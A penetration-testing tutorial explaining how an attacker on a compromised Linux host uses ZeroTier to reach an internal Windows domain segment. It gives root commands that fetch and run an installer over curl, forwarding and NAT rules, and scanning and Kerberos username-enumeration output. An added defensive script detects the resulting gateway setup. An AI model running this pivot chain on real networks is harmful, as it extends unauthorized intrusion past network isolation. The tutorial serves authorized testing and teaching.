Axis Shift: Pivoting using ZeroTier
Pivoting is a specific process in post-exploitation in which an attacker expands his presence in the network. This article is about pivoting using ZeroTier.
Caster - Axis Shift
Genre: Offensive
Label: exploit.org
Release Date: 04.09.2024
Performed by: Caster
Written by: Magama Bazarov
Mastered by: Magama Bazarov
Cover Man: Magama Bazarov (Sony ILCE-7M3, f/5.6, 1/3 sec)
Intro
Pivoting (from the word pivot) is a post-exploitation phase in which the attacker expands their presence in the network. During this phase the attacker bypasses network isolation, firewalls, NAT, and other network obstacles. There is no single best pivoting method; the choice is made case by case. In this article we will talk about ZeroTier.
Disclaimer
This article is for informational purposes and is intended for security specialists conducting testing under an agreed contract. The author and exploit.org are not responsible for any damage caused by the use of the information provided.
Disrupting systems or breaking into other people's computer networks is prosecuted by law. Be careful and do not try your luck.
What is ZeroTier?
ZeroTier is software that allows you to create Virtual Private Networks (VPNs) on top of your existing Internet infrastructure. It is essentially a solution for connecting different devices and networks into a single virtual network, regardless of their physical location. ZeroTier's main advantage is its simplicity and flexibility of configuration, as well as its ability to traverse network restrictions such as NAT without complex router or firewall configuration.
ZeroTier behaves like a virtual LAN, building distributed P2P networks with minimal latency and high performance. It lets users interconnect their devices into a single virtual space.
What's ZeroTier for?
ZeroTier is a very useful tool; it comes in handy for:
- Remote work: Create a virtual network to connect employees or clients working from different locations;
- Connecting disparate networks: ZeroTier allows multiple networks to be connected into a single logical network, providing connectivity between segments that cannot be physically connected;
- Pentesting: Bypasses network barriers and connects to secure network segments, making it an ideal tool for security professionals and pentesters;
- Gaming and multimedia: Create local networks to play games or share multimedia files among friends and family.
ZeroTier Plans
ZeroTier Features
ZeroTier has several features, among them:
- P2P connections: ZeroTier supports direct P2P connections between nodes, which minimizes latency and increases throughput;
- Flexible routing: Supports complex routing, including overlapping networks and dual-NAT networks;
- Cross-platform: ZeroTier runs on multiple platforms, including Windows, macOS, Linux, Android, iOS;
- Easy Setup: ZeroTier setup is simple and does not require deep knowledge of network engineering.
Benefits of ZeroTier
ZeroTier has the following advantages:
- Easy to use: ZeroTier can be set up and used even without much networking experience;
- Scalability: It allows you to easily scale your network by adding new nodes to your virtual network without having to reconfigure;
- Flexibility: It supports complex network topologies and can be used for a wide variety of applications, from simply connecting a pair of devices to creating complex enterprise networks;
- Free version: ZeroTier provides a free version, making it accessible to a wide range of users.
ZeroTier Disadvantages
Despite how good ZeroTier is, it also has drawbacks, including:
- Internet Dependency: ZeroTier requires a stable internet connection to work. Internet is not always available in pentest conditions;
- Management through the cloud: Although ZeroTier allows private networks to be created, they are managed through the cloud, which may raise privacy concerns in certain scenarios;
- Limitations of the free version: The free version has some limitations on the number of nodes in the network and functionality, which may not be sufficient for large enterprise needs;
- Potential delays: Despite support for P2P connections, there may be delays in data transfer when working across multiple nodes.
- Privileges: ZeroTier requires superuser privileges to run. This is a potential disadvantage for a pentester.
ZeroTier Outro
In our case ZeroTier is a great tool for pivoting. The idea is for the attacker to create a virtual network containing their own machine and the compromised machine, and then use the compromised machine as a gateway further into the network infrastructure.
Infrastructure
For this article, I have prepared the following infrastructure. An attacker is on the Internet and has already compromised a machine inside the network, then escalated privileges and gained full control of the host. The compromised host has a second interface, eth1, facing the corporate network where the Windows machines and the domain controller are located. Ultimately, the attacker must reach the corporate infrastructure through the compromised host by creating a ZeroTier network.
| Machine | Operating System |
|---|---|
| Attacker | Debian 12 |
| Victim | Debian 12 |
| AD | Windows Server 2022 |
| RB7 | Windows 10 Enterprise |
| RB8 | Windows 10 Enterprise |
| RB9 | Windows 10 Enterprise |
| Machine | Address |
|---|---|
| Attacker | 89.169.135.43 |
| Victim (eth0) | 192.168.0.40/24 |
| Victim (eth1) | 172.16.150.225/24 |
| AD | 172.16.150.222/24 |
| RB7 | 172.16.150.223/24 |
| RB8 | 172.16.150.221/24 |
| RB9 | 172.16.150.224/24 |
Creating ZT Network
To create a ZeroTier network you need to create an account at zerotier.com; after registering you'll be greeted with this:
In our case we select Basic. After selecting the plan, we are greeted by the ZeroTier network management interface, which looks like this:
Click on “Create A Network” to create a ZeroTier virtual network. A virtual network with a unique name and ID will be created. In my case the ID is 3efa5cb78aa3463e and the name is suspicious_kleinrock.
ZT Network Settings
When a ZeroTier virtual network is created, it is necessary to assign addressing to it so that each host within the ZeroTier virtual network has its own address on the interface. In my case, I selected the 192.168.196.0/24 range for the ZeroTier network:
All in all, the ZeroTier virtual network is ready, now we just need to add the machine we need. Specifically, the attacker's machine and the compromised machine.
Actions of the attacker host
To run ZeroTier on a Linux distribution it must be installed first; this is done very simply:
ssh [email protected]
caster@caster:~$ curl -s https://install.zerotier.com | sudo bash
This command installs ZeroTier on your system, and you can get started. To add your machine to the ZeroTier virtual network you need to know the ID of the network and join it with this command:
caster@caster:~$ sudo zerotier-cli join 3efa5cb78aa3463e
200 join OK
In my case, the ID of my ZeroTier virtual network is 3efa5cb78aa3463e
Once you've connected to the ZeroTier network, you'll see this in your control panel:
The attacker host that joined the network must be authorized in the ZeroTier network; this is done by clicking this button:
The attacker's machine is now on the ZeroTier network, authorized, and has received an address from the previously configured 192.168.196.0/24 range.
Also, once the attacker's machine is connected to the ZeroTier network, it will have a virtual interface with an assigned address:
caster@caster:~$ ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.58 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2b:90ff:fedd:9263 prefixlen 64 scopeid 0x20<link>
ether 3e:2b:90:dd:92:63 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 13 bytes 1006 (1.0 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
This completes the initial configuration of the ZeroTier virtual network, now it's time to connect the previously compromised machine to the ZT network.
Actions of the victim host
Now we need to install ZeroTier on the compromised system, in our case it is a Linux distribution - Debian 12:
@compromised:~# curl -s https://install.zerotier.com | bash
Then connecting to our ZT network:
@compromised:~# zerotier-cli join 3efa5cb78aa3463e
200 join OK
After this action, the following will appear in the ZeroTier Network Control Panel:
The compromised machine must also be authorized to be a member of the ZeroTier network and have a virtual interface with an assigned address.
Once the compromised host was authorized on the ZeroTier network, it had its own address and interface:
@compromised:~# ifconfig ztrfyp74nu
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.59 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2d:27ff:fe62:e6b6 prefixlen 64 scopeid 0x20<link>
ether 3e:2d:27:62:e6:b6 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 45 bytes 5651 (5.5 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
| ZeroTier Host | Address | MAC | ZeroTier Version |
|---|---|---|---|
| Attacker (6d3357253f) | 192.168.196.58 | 3e:2b:90:dd:92:63 | 1.14.0 |
| Victim (6b84e851ea) | 192.168.196.59 | 3e:2d:27:62:e6:b6 | 1.14.0 |
Verify connectivity between the attacker and the compromised host within the ZeroTier network (192.168.196.59 is the address of the compromised machine):
Pivoting
By examining the interfaces of the compromised system, we notice that there is a second interface, eth1, leading to some network. This may well be of interest to a pentester for further penetration of the infrastructure. Through the created and configured ZeroTier network, the attacker will gain access to the network behind eth1:
@compromised:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.0.40 netmask 255.255.255.0 broadcast 192.168.0.255
inet6 fe80::20c:29ff:feed:82f7 prefixlen 64 scopeid 0x20<link>
ether 00:0c:29:ed:82:f7 txqueuelen 1000 (Ethernet)
RX packets 3647 bytes 3619738 (3.4 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 3104 bytes 358721 (350.3 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.16.150.225 netmask 255.255.255.0 broadcast 172.16.150.255
ether 00:0c:29:ed:82:01 txqueuelen 1000 (Ethernet)
RX packets 8 bytes 1468 (1.4 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 27 bytes 3099 (3.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 2824 bytes 173142 (169.0 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2824 bytes 173142 (169.0 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
ztrfyp74nu: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 2800
inet 192.168.196.59 netmask 255.255.255.0 broadcast 192.168.196.255
inet6 fe80::3c2d:27ff:fe62:e6b6 prefixlen 64 scopeid 0x20<link>
ether 3e:2d:27:62:e6:b6 txqueuelen 1000 (Ethernet)
RX packets 11 bytes 966 (966.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65 bytes 8678 (8.4 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
| Victim Interfaces | Address |
|---|---|
| eth0 | 192.168.0.40 |
| eth1 | 172.16.150.225 |
The compromised machine will be the gateway to the 172.16.150.0/24 network, but routing must be configured for this to work:
- Enabling packet forwarding;
- Firewall settings and NAT.
First you need to enable packet forwarding; this feature is disabled by default on Linux distributions.
@compromised:~# sysctl -w net.ipv4.ip_forward=1
net.ipv4.ip_forward = 1
This setting lasts only until the system reboots. To make forwarding permanent, uncomment the net.ipv4.ip_forward=1 line in the /etc/sysctl.conf configuration file.
Now you need to add firewall rules (using iptables) so that the ZeroTier network can reach the 172.16.150.0/24 segment.
First rule:
@compromised:~# iptables -A FORWARD -i eth1 -o ztrfyp74nu -m state --state RELATED,ESTABLISHED -j ACCEPT
What does the first rule do?
-A FORWARD: appends a rule to the FORWARD chain, which handles packets forwarded between interfaces;
-i eth1: the rule applies to packets arriving on interface eth1;
-o ztrfyp74nu: the rule applies to packets leaving through the ztrfyp74nu interface;
-m state --state RELATED,ESTABLISHED: the rule applies only to packets belonging to an already established connection (ESTABLISHED) or associated with an existing connection (RELATED);
-j ACCEPT: packets matching this rule are allowed.
This rule allows packets to be forwarded from interface eth1 to interface ztrfyp74nu only for connections that have already been established or are part of one. It is needed so that reply packets of active connections between the two interfaces are not blocked.
Second rule
@compromised:~# iptables -A FORWARD -i ztrfyp74nu -o eth1 -j ACCEPT
What does the second rule do?
-A FORWARD: appends a rule to the FORWARD chain;
-i ztrfyp74nu: the rule applies to packets arriving on interface ztrfyp74nu;
-o eth1: the rule applies to packets leaving through interface eth1;
-j ACCEPT: packets matching this rule are allowed.
This rule permits forwarding of all packets from interface ztrfyp74nu to interface eth1. It is necessary so that packets arriving on the ZeroTier interface can be forwarded to the physical network through the eth1 interface.
The attacker will also need a route to the 172.16.150.0/24 network; this can be configured in the ZT control panel. The route goes through the compromised machine inside the ZT network:
192.168.196.59 - Victim's address inside the ZT network
Make sure that the necessary network route appears in the routing table on the attacker's side:
172.16.150.0 192.168.196.59 255.255.255.0 UG 5000 0 0 ztrfyp74nu
Important rule for NAT
Now we need a final rule for the firewall, and it deals with NAT:
@compromised:~# iptables -t nat -A POSTROUTING -o eth1 -s 192.168.196.0/24 -j MASQUERADE
What does this rule do?
-t nat: the rule is added to the nat (Network Address Translation) table, which is used to change the source or destination addresses of packets passing through the router;
-A POSTROUTING: the rule is appended to the POSTROUTING chain, which processes packets after they have been routed but before they leave the interface, i.e. at the packet's exit from the system;
-o eth1: the rule applies only to packets that exit through the eth1 interface. If your Internet or other network connection interface is named differently, specify that interface instead of eth1;
-s 192.168.196.0/24: the rule applies only to packets originating from the 192.168.196.0/24 subnet, i.e. your ZeroTier subnet;
-j MASQUERADE: -j specifies the action to perform on packets that match the rule. Here the action is MASQUERADE, which rewrites the packet's source IP address to the IP address of the eth1 interface.
When a packet comes from the 192.168.196.0/24 subnet and is routed out through the eth1 interface, this rule rewrites its source IP address to the address of eth1. This technique is called masquerading; it is needed for the ZeroTier network to reach 172.16.150.0/24 directly, since internal hosts then reply to the victim's eth1 address and need no route back to the ZeroTier subnet.
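A check from the defender's side, added here and not part of Caster's article: given the text of iptables-save and the value of net.ipv4.ip_forward captured on a host, it reports whether that host carries the three signs of the ZeroTier-to-LAN gateway configured above (forwarding on, FORWARD rules touching a zt interface, MASQUERADE on exit). It assumes ZeroTier interface names start with zt, as ztrfyp74nu does; the sample rules are constructed from the article's commands.

```shell
#!/bin/sh
# Added audit helper (not from the original article). Classifies a host from
# two inputs captured on it: the output of `iptables-save` and the value of
# net.ipv4.ip_forward. Assumption: ZeroTier interfaces are named zt*, as
# ztrfyp74nu is in the article.

# Prints a ";"-separated list of findings (possibly empty).
# $1 = iptables-save text, $2 = ip_forward value ("0" or "1")
zt_gateway_findings() {
    rules="$1"
    fwd="$2"
    findings=""
    # 1. Kernel forwarding enabled (sysctl -w net.ipv4.ip_forward=1)
    if [ "$fwd" = "1" ]; then
        findings="${findings}ip_forward=1;"
    fi
    # 2. FORWARD rules that move traffic into or out of a ZeroTier interface
    if printf '%s\n' "$rules" | grep -Eq '^-A FORWARD .*-(i|o) zt[a-z0-9]+'; then
        findings="${findings}forward_zt;"
    fi
    # 3. Source NAT on the way out of a physical interface (MASQUERADE)
    if printf '%s\n' "$rules" | grep -Eq '^-A POSTROUTING .*-j MASQUERADE'; then
        findings="${findings}masquerade;"
    fi
    printf '%s' "$findings"
}

# PIVOT = all three signs present, CLEAN = none, PARTIAL = anything in between
zt_gateway_verdict() {
    case "$(zt_gateway_findings "$1" "$2")" in
        *ip_forward=1*forward_zt*masquerade*) echo "PIVOT" ;;
        "") echo "CLEAN" ;;
        *) echo "PARTIAL" ;;
    esac
}

# Constructed samples: the article's three rules, and a host with no rules.
SAMPLE_PIVOT='*filter
-A FORWARD -i eth1 -o ztrfyp74nu -m state --state RELATED,ESTABLISHED -j ACCEPT
-A FORWARD -i ztrfyp74nu -o eth1 -j ACCEPT
COMMIT
*nat
-A POSTROUTING -s 192.168.196.0/24 -o eth1 -j MASQUERADE
COMMIT'
SAMPLE_CLEAN='*filter
COMMIT'

# Live use on a host: zt_gateway_verdict "$(iptables-save)" "$(sysctl -n net.ipv4.ip_forward)"
echo "constructed pivot host: $(zt_gateway_verdict "$SAMPLE_PIVOT" 1)"
echo "constructed clean host: $(zt_gateway_verdict "$SAMPLE_CLEAN" 0)"
```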
Result
After all of the above configuration, the attacker has access to the 172.16.150.0/24 network that was behind the compromised machine's second interface.
PoC I: NetExec
caster@caster:~$ netexec smb 172.16.150.0/24
SMB 172.16.150.222 445 AD [*] Windows Server 2022 Build 20348 x64 (name:AD) (domain:f1.com) (signing:True) (SMBv1:False)
SMB 172.16.150.223 445 RB7 [*] Windows 10 / Server 2019 Build 19041 (name:RB7) (domain:RB7) (signing:False) (SMBv1:False)
SMB 172.16.150.224 445 RB9 [*] Windows 10 / Server 2019 Build 19041 (name:RB9) (domain:RB9) (signing:False) (SMBv1:False)
SMB 172.16.150.221 445 RB8 [*] Windows 10 / Server 2019 Build 19041 (name:RB8) (domain:RB8) (signing:False) (SMBv1:False)
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
PoC II: Services Scanning
caster@caster:~$ sudo nmap -n -sS -p 88,445,22 172.16.150.0/24 --open --min-rate=1280
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 23:36 UTC
Nmap scan report for 172.16.150.221
Host is up (0.090s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.222
Host is up (0.086s latency).
Not shown: 1 filtered tcp port (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
88/tcp open kerberos-sec
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.223
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.224
Host is up (0.087s latency).
Not shown: 2 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
445/tcp open microsoft-ds
Nmap scan report for 172.16.150.225
Host is up (0.086s latency).
Not shown: 2 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
PoC III: Kerberos Attacks (Enumeration)
caster@caster:~$ ./kerbrute userenum --dc ad.f1.com -d f1.com kerusernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/03/24 - Ronnie Flathers @ropnop
2024/09/03 23:56:03 > Using KDC(s):
2024/09/03 23:56:03 > ad.f1.com:88
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > [+] VALID USERNAME: [email protected]
2024/09/03 23:56:03 > Done! Tested 4 usernames (3 valid) in 0.271 seconds
Now the attacker can further interact with this subnet, look for vulnerabilities, and continue offensive actions. This is how this pivoting method works.
Keep in mind, though, that the attacker sits behind NAT: because of the MASQUERADE rule on the compromised machine, hosts in the internal segment see the attacker's traffic as coming from the victim's eth1 address.
Outro
In this article, I looked at the process of pivoting using ZeroTier, a powerful tool that can greatly enhance an attacker's post-exploitation capabilities. ZeroTier makes it easy to bypass network isolation and penetrate protected network segments while providing flexibility and ease of customization.
I hope this material has been helpful in understanding the capabilities of ZeroTier in the context of pentesting. Proper use of such tools can help security professionals find and remediate vulnerabilities, thereby improving the overall security of corporate networks.